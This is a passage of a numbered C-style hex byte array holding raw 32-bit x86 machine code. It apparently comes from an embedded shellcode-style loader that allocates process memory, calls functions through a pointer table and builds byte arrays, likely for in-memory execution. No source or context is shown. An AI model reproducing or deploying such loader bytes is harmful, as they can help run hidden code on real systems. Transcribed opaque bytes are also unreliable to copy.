514 0xa0, 0xe9, 0xed, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa0, 0x85, 0xc0, 0x74,
515 0x70, 0x8b, 0x45, 0x08, 0x8b, 0x58, 0x6c, 0x8b, 0x45, 0xa0, 0x89, 0x85,
516 0xc4, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x74, 0xff, 0xd0,
517 0x8b, 0x8d, 0xc4, 0xfc, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44,
518 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff, 0xd3, 0x83,
519 0xec, 0x0c, 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x74, 0x36, 0xc7,
520 0x45, 0x98, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xb8,
521 0x00, 0x00, 0x00, 0x8b, 0x55, 0xa0, 0x8d, 0x4d, 0x98, 0x89, 0x4c, 0x24,
522 0x0c, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x04,
523 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
524 0x45, 0xe0, 0xeb, 0x01, 0x90, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xcd,
525 0x00, 0x00, 0x00, 0x8b, 0x45, 0xa0, 0x85, 0xc0, 0x0f, 0x84, 0xc2, 0x00,
526 0x00, 0x00, 0x8b, 0x45, 0xa0, 0x89, 0x85, 0xc8, 0xfc, 0xff, 0xff, 0x8b,
527 0x45, 0x08, 0x8d, 0x90, 0x30, 0x0d, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x89,
528 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7,
529 0x44, 0x24, 0x10, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x85, 0xc8, 0xfc, 0xff,
530 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00,
531 0x00, 0x89, 0x54, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
532 0xe8, 0xdf, 0x41, 0x00, 0x00, 0x89, 0x45, 0xb8, 0x83, 0x7d, 0xb8, 0x00,
533 0x78, 0x28, 0x8b, 0x55, 0xa0, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d,
534 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24,
535 0x04, 0x89, 0x04, 0x24, 0xe8, 0x79, 0x3b, 0x00, 0x00, 0xc7, 0x45, 0xe0,
536 0x01, 0x00, 0x00, 0x00, 0xeb, 0x07, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00,
537 0x00, 0x8b, 0x45, 0xa0, 0x89, 0x44, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04,
538 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x89, 0x04, 0x24, 0xe8, 0x21,
539 0x3b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x58, 0x78, 0x8b, 0x45, 0x08,
540 0x8b, 0x40, 0x74, 0xff, 0xd0, 0x8b, 0x55, 0xe4, 0x89, 0x54, 0x24, 0x08,
541 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xff,
542 0xd3, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xbc, 0x00, 0x00,
543 0x00, 0x8b, 0x55, 0xc4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
544 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xbc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xc8,
545 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b,
546 0x80, 0xbc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xcc, 0x89, 0x14, 0x24, 0xff,
547 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84, 0xac, 0x00,
548 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x04, 0x02, 0x00, 0x00, 0x83,
549 0xf8, 0x03, 0x0f, 0x85, 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
550 0x80, 0x30, 0x0d, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x8b, 0x45, 0x08, 0x8b,
551 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x89,
552 0xc3, 0x8b, 0x45, 0x08, 0x8d, 0x88, 0x18, 0x0d, 0x00, 0x00, 0x8b, 0x45,
553 0x08, 0x8d, 0x90, 0x08, 0x0d, 0x00, 0x00, 0x89, 0x5c, 0x24, 0x0c, 0x8b,
554 0x45, 0xb4, 0x89, 0x44, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14,
555 0x24, 0xe8, 0x48, 0x45, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x50, 0x2c,
556 0x8b, 0x40, 0x28, 0x8b, 0x4d, 0x08, 0x81, 0xc1, 0x00, 0x0c, 0x00, 0x00,
557 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x89, 0x0c, 0x24, 0xe8,
558 0x12, 0x42, 0x00, 0x00, 0x89, 0x45, 0xa8, 0x89, 0x55, 0xac, 0x8b, 0x45,
559 0xb4, 0x8b, 0x90, 0x1c, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x18, 0x05, 0x00,
560 0x00, 0x89, 0xc3, 0x33, 0x5d, 0xa8, 0x89, 0xde, 0x89, 0xd0, 0x33, 0x45,
561 0xac, 0x89, 0xc7, 0x89, 0xf8, 0x09, 0xf0, 0x85, 0xc0, 0x74, 0x07, 0xb8,
562 0x00, 0x00, 0x00, 0x00, 0xeb, 0x03, 0x8b, 0x45, 0xe0, 0x8d, 0x65, 0xf4,
563 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x81, 0xec,
564 0x50, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
565 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xd4,
566 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x22, 0x01, 0x00, 0x00, 0x8b,
567 0x45, 0x08, 0x8b, 0x80, 0xd4, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b,
568 0x4d, 0x08, 0x8d, 0x99, 0x34, 0x08, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x81,
569 0xc1, 0x24, 0x08, 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24,
570 0x04, 0x89, 0x0c, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4,
571 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0xde, 0x00, 0x00, 0x00, 0x8b, 0x45,
572 0x0c, 0x8d, 0x50, 0x0c, 0x8d, 0x85, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x44,
573 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
574 0xe8, 0x6a, 0xef, 0xff, 0xff, 0x8b, 0x45, 0x10, 0x8b, 0x00, 0x8b, 0x00,
575 0x8b, 0x40, 0x0c, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x04, 0x8b, 0x55, 0x08,
576 0x8d, 0x8a, 0x44, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x12, 0x89,
577 0x5c, 0x24, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x8d, 0x8d, 0xd4, 0xfd, 0xff,
578 0xff, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
579 0x10, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x72, 0x8b, 0x45,
580 0x10, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x10,
581 0x8b, 0x52, 0x04, 0x8d, 0x4d, 0xd4, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14,
582 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
583 0x00, 0x78, 0x5e, 0x8b, 0x45, 0xd4, 0x85, 0xc0, 0x74, 0x57, 0x8b, 0x45,
584 0x10, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x24, 0x8b, 0x55, 0x10,
585 0x8d, 0x72, 0x08, 0x8b, 0x55, 0x08, 0x8d, 0x9a, 0x64, 0x08, 0x00, 0x00,
586 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x54, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10,
587 0x8b, 0x52, 0x04, 0x89, 0x74, 0x24, 0x0c, 0x89, 0x5c, 0x24, 0x08, 0x89,
588 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89,
589 0x45, 0xf4, 0xeb, 0x15, 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x04, 0x00, 0x00,
590 0x00, 0x00, 0xeb, 0x09, 0x8b, 0x45, 0x10, 0xc7, 0x00, 0x00, 0x00, 0x00,
591 0x00, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x0d, 0x8b, 0x45, 0x08, 0x8b, 0x80,
592 0xd4, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x44, 0x8b, 0x45, 0x08, 0x8b,
593 0x80, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x08, 0x8b,
594 0x55, 0x08, 0x8d, 0x8a, 0x64, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81,
595 0xc2, 0x54, 0x08, 0x00, 0x00, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x4c, 0x24,
596 0x0c, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
597 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec,
598 0x14, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x79, 0x14, 0x8b, 0x45,
599 0x10, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
600 0x00, 0xe9, 0x4e, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08,
601 0x8b, 0x00, 0x8b, 0x40, 0x28, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x08, 0x89,
602 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x83, 0x7d,
603 0xf4, 0x00, 0x0f, 0x88, 0x25, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f,
604 0xb6, 0x80, 0x0c, 0x01, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x2b, 0x8b, 0x45,
605 0x10, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x34, 0x8b, 0x55, 0x10,
606 0x8d, 0x4a, 0x0c, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24,
607 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4,
608 0xe9, 0x85, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x01,
609 0x00, 0x00, 0x8d, 0x85, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08,
610 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xb0,
611 0xed, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00,
612 0x8d, 0x95, 0xd4, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
613 0xec, 0x04, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08, 0x8b,
614 0x00, 0x8b, 0x40, 0x30, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x0c, 0x8b, 0x55,
615 0x10, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
616 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c, 0x24, 0x04, 0x89,
617 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xf4, 0x8b, 0x45,
618 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe8, 0x89, 0x14,
619 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88,
620 0x5d, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x0c, 0x8b, 0x00,
621 0x8b, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x5a, 0x10, 0x8b, 0x55, 0x08, 0x8d,
622 0x8a, 0x74, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x0c, 0x89,
623 0x5c, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0,
624 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88,
625 0x21, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x00, 0x00, 0x00, 0x00, 0x8b,
626 0x45, 0x0c, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89, 0x45, 0xd8, 0x8b,
627 0x45, 0x08, 0x8b, 0x80, 0x84, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xd8, 0x89,
628 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0xc7,
629 0x04, 0x24, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
630 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x84, 0xdd, 0x00, 0x00, 0x00,
631 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x40,
632 0x0c, 0x89, 0x45, 0xe0, 0xeb, 0x1e, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xf0,
633 0x01, 0xc2, 0x8b, 0x4d, 0x0c, 0x8b, 0x45, 0xf0, 0x01, 0xc8, 0x05, 0x28,
634 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x00, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01,
635 0x8b, 0x45, 0x0c, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x39, 0x45, 0xf0,
636 0x72, 0xd4, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x10, 0x8b, 0x00, 0x8b, 0x80,
637 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x14, 0x8b, 0x55,
638 0x10, 0x8b, 0x52, 0x10, 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xe4, 0x89,
639 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
640 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0,
641 0x89, 0x45, 0xec, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
642 0xe4, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xe0, 0xeb, 0x2e, 0x8b, 0x55, 0x0c,
643 0x8b, 0x45, 0xf0, 0x01, 0xd0, 0x05, 0x28, 0x05, 0x00, 0x00, 0xc6, 0x00,
644 0x00, 0x8b, 0x55, 0xe0, 0x8b, 0x45, 0xf0, 0x01, 0xc2, 0x8b, 0x4d, 0x0c,
645 0x8b, 0x45, 0xf0, 0x01, 0xc8, 0x05, 0x28, 0x05, 0x00, 0x00, 0x0f, 0xb6,
646 0x00, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x45, 0x0c, 0x8b, 0x80,
647 0x24, 0x05, 0x00, 0x00, 0x39, 0x45, 0xf0, 0x72, 0xc4, 0x8b, 0x45, 0x08,
648 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24,
649 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0xec, 0x8d, 0x65, 0xf8, 0x5b,
650 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0xc4, 0x02, 0x00,
651 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x00,
652 0x00, 0x00, 0x00, 0xc7, 0x45, 0x98, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
653 0x9c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x00, 0x00, 0x00, 0x00,
654 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x45, 0x82, 0x00,
655 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x0c,
656 0x03, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x14, 0x8b, 0x00, 0x8b,
657 0x40, 0x40, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x1c, 0x8b, 0x55, 0x10, 0x8b,
658 0x52, 0x14, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
659 0xec, 0x08, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0xcd,
660 0x02, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b,
661 0x40, 0x48, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x1c, 0x8d, 0x4d, 0xdc, 0x89,
662 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89,
663 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0x47, 0x05, 0x00, 0x00,
664 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x94, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xdc,
665 0x8d, 0x8d, 0x78, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44,
666 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
667 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x98, 0x00,
668 0x00, 0x00, 0x8b, 0x55, 0xdc, 0x8d, 0x8d, 0x7c, 0xff, 0xff, 0xff, 0x89,
669 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89,
670 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x8b, 0x85,
671 0x7c, 0xff, 0xff, 0xff, 0x8b, 0x95, 0x78, 0xff, 0xff, 0xff, 0x29, 0xd0,
672 0x83, 0xc0, 0x01, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84,
673 0xa3, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x88, 0x00, 0x00,
674 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
675 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x0c, 0x00, 0x00, 0x00,
676 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0x0f,
677 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0xd8, 0x00,
678 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00, 0x8d,
679 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24,
680 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x6b, 0xea, 0xff, 0xff,
681 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x70,
682 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0x76, 0xfd, 0xff,
683 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xe4,
684 0x66, 0xc7, 0x45, 0xa8, 0x08, 0x20, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x88,
685 0x00, 0x00, 0x00, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x89, 0x54, 0x24,
686 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
687 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xb0,
688 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x4a, 0x8b, 0x45, 0x08,
689 0x8b, 0x98, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c,
690 0x00, 0x00, 0x00, 0x8b, 0x55, 0x84, 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00,
691 0x00, 0x8b, 0x55, 0xe4, 0x01, 0xca, 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff,
692 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x55, 0xb0, 0x89, 0x44, 0x24, 0x08, 0x8d,
693 0x45, 0x84, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd3, 0x83,
694 0xec, 0x0c, 0x8b, 0x45, 0x84, 0x83, 0xc0, 0x01, 0x89, 0x45, 0x84, 0x8b,
695 0x45, 0x84, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x39, 0xd0, 0x72, 0xa9,
696 0xeb, 0x68, 0x66, 0xc7, 0x45, 0xa8, 0x08, 0x20, 0x8b, 0x45, 0x08, 0x8b,
697 0x80, 0x88, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00,
698 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
699 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xb0,
700 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x98,
701 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00,
702 0x00, 0x8d, 0x55, 0x82, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
703 0x8b, 0x55, 0xb0, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0x84, 0x89, 0x44,
704 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd3, 0x83, 0xec, 0x0c, 0xc7, 0x45,
705 0x84, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x8c, 0x00,
706 0x00, 0x00, 0x8d, 0x55, 0xa8, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x55, 0x84,
707 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0,
708 0x83, 0xec, 0x0c, 0x66, 0xc7, 0x45, 0x98, 0x01, 0x00, 0xc7, 0x45, 0xa0,
709 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x1c, 0x8b, 0x00,
710 0x8b, 0x80, 0x94, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x1c,
711 0x8d, 0x4d, 0x88, 0x89, 0x4c, 0x24, 0x18, 0x8b, 0x4d, 0xf4, 0x89, 0x4c,
712 0x24, 0x14, 0x8b, 0x4d, 0x98, 0x89, 0x4c, 0x24, 0x04, 0x8b, 0x4d, 0x9c,
713 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xa0, 0x89, 0x4c, 0x24, 0x0c, 0x8b,
714 0x4d, 0xa4, 0x89, 0x4c, 0x24, 0x10, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
715 0xec, 0x1c, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84, 0xd4,
716 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00,
717 0x8b, 0x55, 0xb0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b,
718 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x89,
719 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xe9, 0xa7, 0x02, 0x00, 0x00,
720 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x1c, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x98,
721 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x02, 0x00, 0x00,
722 0x8d, 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54,
723 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x66, 0xe8, 0xff,
724 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8d, 0x95,
725 0x76, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
726 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
727 0x00, 0x00, 0xe9, 0x51, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90,
728 0x0c, 0x03, 0x00, 0x00, 0x8d, 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44,
729 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
730 0xe8, 0x1a, 0xe8, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00,
731 0x00, 0x00, 0x8d, 0x95, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff,
732 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xe8, 0x83, 0x7d, 0xe8, 0x00, 0x0f,
733 0x84, 0xf2, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x14, 0x8b,
734 0x00, 0x8b, 0x40, 0x44, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x18, 0x8b, 0x55,
735 0x10, 0x8b, 0x52, 0x14, 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xec, 0x89,
736 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
737 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0xa7, 0x01, 0x00, 0x00,
738 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f, 0xb6,
739 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0x0e, 0x01, 0x00,
740 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00, 0x8d, 0x85,
